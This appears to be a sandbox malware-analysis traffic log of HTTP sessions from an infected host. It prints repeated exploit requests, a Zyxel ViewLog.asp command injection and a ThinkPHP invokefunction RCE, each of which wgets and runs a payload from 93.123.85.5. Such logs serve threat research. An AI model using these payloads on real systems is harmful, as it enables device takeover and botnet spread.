                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 43 72 6f 73 73 20 53 69 74 65 20 41 63 74 69 6f 6e 20 64 65 74 65 63 74 65 64 21 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>Cross Site Action detected!</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              207192.168.2.234499885.198.10.458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.171380997 CET5032OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:40.637196064 CET5041INHTTP/1.1 404 Not Found
                                                              Content-Type: text/plain
                                                              Date: Mon, 13 Nov 2023 21:18:40 GMT
                                                              Content-Length: 18
                                                              Connection: close
                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                              Data Ascii: 404 page not found


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              208192.168.2.235587488.136.210.7980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.228856087 CET5033OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:41.168216944 CET5152OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:43.023977995 CET5373OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:46.863507032 CET5856OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:54.286407948 CET6730OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:09.132476091 CET8596OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:38.572566032 CET12137OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              209192.168.2.235435288.99.235.25080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.232037067 CET5033OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:40.538260937 CET5040INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              21192.168.2.235133662.234.77.1608080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:10.863934994 CET1520OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:11.182179928 CET1528INHTTP/1.1 200 OK
                                                              Server: nginx/1.19.6
                                                              Date: Mon, 13 Nov 2023 21:18:11 GMT
                                                              Content-Type: text/html
                                                              Last-Modified: Wed, 12 Apr 2023 01:58:45 GMT
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              ETag: W/"64361055-18a1"
                                                              Content-Encoding: gzip
                                                              Data Raw: 37 32 33 0d 0a 1f 8b 08 00 00 00 00 00 04 0a c5 19 59 8f db 44 f8 bd 52 ff c3 90 aa 4a b6 8d ed 38 d7 26 d9 24 a2 74 7b f0 00 54 ea 3e 50 a9 2f 13 cf 38 99 d6 f1 44 33 4e b2 4b 85 04 02 41 a1 a0 22 21 b5 1c 7d e0 90 28 12 e2 12 94 f2 40 e1 cf 74 b3 dd 7f c1 37 b6 e3 d8 c9 c6 7b b0 15 2b 6d d6 99 ef 9c cf df bd cd 17 d6 5f 3b bf 71 ed ca 05 d4 f3 fa 4e bb 19 7e 52 4c da cd 3e f5 30 b2 7a 58 48 ea b5 86 9e ad d5 c2 33 17 f7 69 6b c4 e8 78 c0 85 87 2c ee 7a d4 f5 5a 99 31 23 5e af 45 e8 88 59 54 f3 bf e4 99 cb 3c 86 1d 4d 5a d8 a1 2d 33 13 67 40 a8 b4 04 1b 78 8c bb 11 8f c9 a3 c7 db 1f df 9f 3c fe 15 1e 26 1f be 35 79 f0 f3 f6 ed 2f 27 f7 7e 79 fa e7 8f db ff bc 13 a7 be 49 b7 c6 5c 10 79 60 52 87 b9 37 91 a0 4e 8b 81 c2 a8 27 a8 dd 32 a4 87 3d 66 19 ac 8f bb 54 1a 0e ef 72 1d a0 ed a6 c7 3c 87 b6 97 a9 d1 34 02 78 53 7a 5b 80 a6 4c 86 6e 9d 3c 81 fc 1f 3e a2 c2 76 f8 b8 81 7a 8c 10 ea ae 05 80 37 4f 9e 08 1e 14 76 3e 78 ec 70 b2 15 3e 9e c2 83 c1 8c 47 8f b2 6e cf 6b 20 b3 50 38 3d 4f 7f 26 a4 98 e3 33 23 ee 63 d1 65 6e 03 15 42 4a 84 06 98 10 e6 76 e3 47 c6 19 64 c3 6b d3 6c dc 67 ce 56 03 65 5e 61 96 e0 92 db 1e ba 86 2f 53 96 bf 4c 9d 11 05 db 60 f4 2a 1d d2 d9 d7 fc 15 e0 74 11 bb 5d 74 f5 7c fe 32 13 18 64 71 74 15 bb 12 5d 7a 29 7f bd 72 f1 dc 85 eb b5 8b d5 8b d7 eb d5 f3 95 eb f5 0b eb 66 fe 9c 00 0f c8 4b 40 d1 24 15 cc ce ac a1 33 c6 9c 55 74 a9 39 1c 2b 2d 35 8b 09 cb a1 fe 57 2a 66 d7 f2 fd a9 81 aa e5 c1 66 74 b1 a9 9d 12 87 c1 fd 35 87 da 60 41 ad 54 8c e1 87 20 8f 0f e6 21 03 2e c1 51 39 98 0d 77 24 77 86 1e 8d 84 04 8c 2a d1 9b 40 c8 a7 4f 1c 08 b8 9c cd 45 5f e3 82 f9 c6 37 ab 83 4d a4 3e 22 36 d8 05 2f 0b 44 08 0e 6e 47 b5 e8 04 55 24 62 ae ad 62 85 22 70 53 8a 45 48 16 79 cd 8b e0 ee b6 80 b0 93 68 81 fa 56 60 4b 84 0a a7 67 e6 02 2d a7 4a 35 42 92 5c 81 d0 ee 4a a4 50 c4 1b f9 7e 96 4e 5a aa 2e 10 2b 6f 8f 78 2c 7d 7f 7b 00 e0 82 0d d7 eb 69 56 8f 39 24 67 ae cc 24 6b 63 da b9 c9 3c 6d 51 f5 7a 52 fc 3e 08 c7 a0 56 f1 40 6a 99 b5 fd f4 4a 62 1c 83 62 a5 03 29 56 5c dd 4f b1 24 46 9a 62 f0 be 66 af 28 2d 0c 8b f1 d8 4c 89 28 3f 7e e2 b8 41 88 cd 12 56 f4 7a a3 78 02 6c 34 a3 48 d3 16 b2 08 a4 8d bd dd 6e f1 78 89 23 86 b7 ac c5 e2 77 9a 6b e2 67 0b 89 60 31 57 24 52 ce ec 06 08 25 d3 54 1c d2 81 b2 46 85 26 20 1d 0e 65 23 76 6d 84 a6 01 12 a5 0e 8d 50 07 43 fe d6 0a 7a 49 46 a1 9d 0a 7e 2e c6 8b 87 4b 68 bc 44 f6 9b 5a 2f 71 78 58 f3 c5 4d 9f 34 5f 1c 32 67 be 38 28 cd 7c d5 74 f3 45 e0 e7 62 be 78 50 87 e6 4b 04 d3 d4 7c 89 c3 c3 9a cf dc a3 14 86 55 32 01 9a 33 60 02 96 66 c1 7a ba 05 23 f0 51 2c d8 71 86 b1 24 d4 c1 d6 cd ae e0 43 97 68 16 77 b8 68 a0 53 a6 5d a6 15 3c 5f 36 f7 48 03 cb f2 c3 16 75 a0 6b 9b 25 ba 3d 64 d8 76 a7 58 ad fc 07 19 82 92 7d 04 54 ea 95 ff 22 a0 2b 28 75 53 45 14 0a b8 5a 37 8f 7e 87 19 f3 05 57 68 a0 3e 34 bf b1 b6 a6 a8 2f 6d 6c 10 8a 72 d4 e1 c8 96 96 95 c8 ab 62 ad d2 9c 3e b7 f6 6e 94 a6 17 89 aa 4e 23 e8 9d 1c 68 d2 72 85 3c 2a cc 7a a6 44 57 e5 e3 ef 81 14 69 82 50 b1 92 68 c9 52 25 69 aa 8b 3d 88 b4 45 c4 98 c4 d5 43 48 54 bd f1 41 04 2e e0 c5 e4 a9 11 65 e6 13
                                                              Data Ascii: 723YDRJ8&$t{T>P/8D3NKA"!}(@t7{+m_;qN~RL>0zXH3ikx,zZ1#^EYT<MZ-3g@x<&5y/'~yI\y`R7N'2=fTr<4xSz[Ln<>vz7Ov>xp>Gnk P8=O&3#cenBJvGdklgVe^a/SL`*t]t|2dqt]z)rfK@$3Ut9+-5W*fft5`AT !.Q9w$w*@OE_7M>"6/DnGU$bb"pSEHyhV`Kg-J5B\JP~NZ.+ox,}{iV9$g$kc<mQzR>V@jJbb)V\O$Fbf(-L(?~AVzxl4Hnx#wkg`1W$R%TF& e#vmPCzIF~.KhDZ/qxXM4_2g8(|tEbxPK|U23`fz#Q,q$ChwhS]<_6Huk%=dvX}T"+(uSEZ7~Wh>4/mlrb>nN#hr<*zDWiPhR%i=ECHTA.e


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              210192.168.2.233891894.121.150.2078080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.424329042 CET5037OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              211192.168.2.235055694.120.100.988080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.429826021 CET5037OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              21285.113.217.1428080192.168.2.2345110
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.447242975 CET5038INHTTP/1.1 408 Request Timeout
                                                              Content-Type: text/html
                                                              Server: httpd
                                                              Date: Mon, 13 Nov 2023 21:18:40 GMT
                                                              Connection: close
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Cache-Control: post-check=0, pre-check=0
                                                              Pragma: no-cache
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 61 70 70 65 61 72 65 64 20 77 69 74 68 69 6e 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 74 69 6d 65 20 70 65 72 69 6f 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request appeared within a reasonable time period.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              213192.168.2.2334808112.223.85.8480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.855791092 CET5136OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:41.169553041 CET5153INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:41 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              214192.168.2.2342866112.126.219.5180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:40.855884075 CET5136OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:41.171932936 CET5154INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:44 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              215192.168.2.233896485.195.34.1818080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.404053926 CET5266OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:42.725368977 CET5285INHTTP/1.1 404 Not Found
                                                              Cache-control: no-cache
                                                              Server: Ubicom/1.1
                                                              Content-Length: 9
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              216192.168.2.233376495.165.2.638080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.433052063 CET5269OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:42.783546925 CET5336INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 22:57:27 GMT
                                                              Server:
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              217192.168.2.235741662.171.177.1848080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.738902092 CET5333OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              218192.168.2.235477285.253.217.1728080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.739510059 CET5334OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              219192.168.2.235113894.122.214.1628080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:42.774221897 CET5335OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              22192.168.2.234012462.138.7.1408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:10.864058971 CET1520OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:12.532814980 CET1649OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:12.856071949 CET1685INHTTP/1.1 500 Server Error
                                                              Date: Mon, 13 Nov 2023 21:18:12 GMT
                                                              X-Content-Type-Options: nosniff
                                                              Content-Encoding: gzip
                                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                              Cache-Control: no-cache,no-store,must-revalidate
                                                              X-Hudson-Theme: default
                                                              Referrer-Policy: same-origin
                                                              Content-Type: text/html;charset=utf-8
                                                              Set-Cookie: JSESSIONID.81d96b58=node01on86fu75cpai1ev7zf0w571f843888.node0;Path=/;HttpOnly
                                                              X-Hudson: 1.395
                                                              X-Jenkins: 2.150.1
                                                              X-Jenkins-Session: 7d745e3a
                                                              X-Frame-Options: sameorigin
